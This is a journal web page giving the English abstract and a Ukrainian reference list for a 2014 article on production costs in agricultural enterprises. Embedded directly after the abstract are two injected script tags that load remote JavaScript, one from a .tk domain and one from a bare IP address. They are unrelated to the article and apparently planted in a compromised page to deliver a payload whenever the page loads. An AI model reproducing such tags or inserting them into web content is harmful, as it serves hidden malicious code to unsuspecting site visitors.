ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: 658:636
Сторінка молодого науковця

The formation of production costs on agricultural enterprises / Nagorniuk O.P. // Ekonomika APK. - 2014. - № 6 - P. 96

The theoretical aspects of the production costs of farms associated with the peculiarities of the functioning of the productive resources (land, labour, capital and entrepreneurship) are considered; methodical approaches to the management of production costs of agricultural enterprises are developed; the analysis of production costs and the efficiency of livestock production is carrried out; ways of improving their production costs in the future are suggested. Refs.: 12.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: production costs, inputs, land, labour, capital, entrepreneurship

References

 1. Андрійчук В.Г. Економіка підприємств агропромислового комплексу : підруч. / В.Г. Андрійчук. – К.: КНЕУ, 2013. – 779 с.
 2. Базилевич В.Д. Мікроекономіка : підруч. ; за ред. В.Д. Базилевича. – 2–ге вид. – К.: Знання, 2008. – 680 с.
 3. Дем’яненко С.І. Власність на виробничі ресурси і формування собі­вартості продукції в сільському господарстві: моногр. / С. І. Дем’яненко. – К. : МНТУ, 1996. – 160 с.
 4. Дем’яненко С.І. Вплив макроекономічного регулювання на вироб­ничі витрати у сільському господарстві / С. І. Дем’яненко. – К. : КДЕУ, 1996. – 100 с.
 5. Дем’яненко С.І. Менеджмент виробничих витрат у сільському господарстві / С. І. Дем’яненко. – К. : КНЕУ, 1998. – 264 с.
 6. Деякі особливості сучасної методології вимірювання витрат та результатів операційної діяльності аграрних підприємств / [Ю. С. Коваленко, І. В. Охріменко, О. В. Демченко та ін.] // Агроінком. – 2007. – № 11-12. – C. 59-65.
 7. Іванюта П.В. Управління ресурсами і витратами : навч. посіб. / П. В. Іванюта, О. П. Лугівська ; за ред. проф. С. М. Іванюти. – К. : Центр навчальної літератури, 2009. – 320 с.
 8. Кулинич М.Б. Процеси формування собівартості продукції : моногр. / М.Б. Кулинич. – Луцьк : РВВ “Вежа” Волин. держ. ун-ту ім. Лесі Українки, 2006. – 204 с.
 9. Охріменко І.В. Витрати та собівартість сільськогосподарської про­дукції в регулюванні економічних відносин сільськогосподарських підприємств : моногр. / І. В. Охріменко. – К.: Логос, 2009. – 388 с.
 10. Турило А. М. Управління витратами підприємства : навч. посіб. / А.М. Турило, Ю.Б. Кравчук, А.А. Турило. – К. : Центр навчальної літератури, 2006. – 120 с.
 11. Фандель Гюнтер. Теорія виробництва і витрат / Гюнтер Фандель : пер. з нім. під керів. і наук. ред. М. Г. Грещака. – К. : Таксон, 2000. – 520 с.
 12. Цал-Цалко Ю.С. Витрати підприємства : навч. посіб. / Ю.С. Цал-Цалко. – К. : ЦУЛ, 2002. – 656 с.
Read article: 14_06_96-101.pdf